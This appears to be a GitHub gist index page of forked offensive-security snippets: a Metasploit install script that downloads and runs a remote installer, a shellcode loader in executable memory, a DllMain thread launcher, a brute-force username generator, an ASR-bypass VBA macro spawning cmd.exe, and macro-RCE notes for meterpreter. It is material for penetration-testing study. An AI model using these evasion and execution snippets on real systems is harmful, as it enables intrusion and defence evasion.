servomekanism

@servomekanism
servomekanism / metasploit.ssh
Created February 21, 2025 06:55 — forked from CloudLinuxDeveloper/metasploit.ssh
How to install Metasploit Framework on Ubuntu
# Install metasploit
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod 755 msfinstall
./msfinstall
# Create msf database.
msfdb init
# Launch msfconsole

radare2

load without any analysis (file header at offset 0x0): r2 -n /path/to/file

  • analyze all: aa
  • show sections: iS
  • list functions: afl
  • list imports: ii
  • list entrypoints: ie
  • seek to function: s sym.main
@servomekanism
servomekanism / DllMainThread.c
Created May 17, 2024 15:12 — forked from securitytube/DllMainThread.c
Launch Shellcode as a Thread via DllMain rather than a new process
// Dll Hijacking via Thread Creation
// Author - Vivek Ramachandran
// Learn Pentesting Online -- http://PentesterAcademy.com/topics and http://SecurityTube-Training.com
// Free Infosec Videos -- http://SecurityTube.net
#include <windows.h>
#define SHELLCODELEN 2048
@servomekanism
servomekanism / perfect-loaders.md
Created October 12, 2023 08:55 — forked from EvanMcBroom/perfect-loaders.md
Perfect Loader Implementations

Thank you to SpecterOps for supporting this research and to Lee and Sarah for proofreading and editing! Crossposted on the SpecterOps Blog.

TLDR: You may use fuse-loader or perfect-loader as examples for extending an OS's native loader to support in-memory libraries.

Some software applications require the ability to load dynamic libraries from the memory of the application's own process. The majority of desktop OSes do not support this use case, so a number of developers have reimplemented the process of loading a library to overcome this limitation.

@servomekanism
servomekanism / feedly.opml
Created September 26, 2023 14:40 — forked from prachauthit/feedly.opml
Feedly Security Feed
<?xml version="1.0" encoding="UTF-8"?>
<opml version="1.0">
<head>
<title>Matt subscriptions in feedly Cloud</title>
</head>
<body>
<outline text="RedTeaming" title="RedTeaming">
<outline type="rss" text="Strategic Cyber LLC" title="Strategic Cyber LLC" xmlUrl="http://blog.strategiccyber.com/feed/" htmlUrl="https://blog.cobaltstrike.com"/>
<outline type="rss" text="Silent Break Security" title="Silent Break Security" xmlUrl="http://silentbreaksecurity.com/feed/" htmlUrl="https://silentbreaksecurity.com"/>
#include <windows.h>
#include <iostream>
int main(){
//code that just returns 5+5 (10)
static const int code_lenght = 44;
unsigned char opcodes[code_lenght] = "\x55\x48\x89\xe5\xb8\x0a\x00\x00\x00\x5d\xc3";
HANDLE mem_handle = CreateFileMappingA( INVALID_HANDLE_VALUE, NULL, PAGE_EXECUTE_READWRITE, 0, code_lenght, NULL);
@servomekanism
servomekanism / namemash.py
Created March 23, 2023 14:18 — forked from superkojiman/namemash.py
Creating a user name list for brute force attacks.
#!/usr/bin/env python3
'''
NameMash by superkojiman
Generate a list of possible usernames from a person's first and last name.
https://blog.techorganic.com/2011/07/17/creating-a-user-name-list-for-brute-force-attacks/
'''
@servomekanism
servomekanism / ASR Rules Bypass.vba
Created September 4, 2022 16:38 — forked from byt3bl33d3r/ASR Rules Bypass.vba
ASR rules bypass creating child processes
' ASR rules bypass creating child processes
' https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction
' https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office
' https://www.darkoperator.com/blog/2017/11/6/windows-defender-exploit-guard-asr-vbscriptjs-rule
Sub ASR_blocked()
Dim WSHShell As Object
Set WSHShell = CreateObject("Wscript.Shell")
WSHShell.Run "cmd.exe"
End Sub
@servomekanism
servomekanism / Various-Macro-Based-RCEs.md
Created June 24, 2022 15:50 — forked from mgeeky/Various-Macro-Based-RCEs.md
Various Visual Basic Macros-based Remote Code Execution techniques to get your meterpreter invoked on the infected machine.

This is a note for myself describing various Visual Basic macro construction strategies that could be used for remote code execution via a malicious document vector. Nothing new or fancy here, just a list of techniques, tools and scripts collected in one place for a quick glimpse of an eye before setting a payload.

All of the examples below were generated using the remote address 192.168.56.101.

List:

  1. Page substitution macro for luring user to click Enable Content
  2. The Unicorn Powershell based payload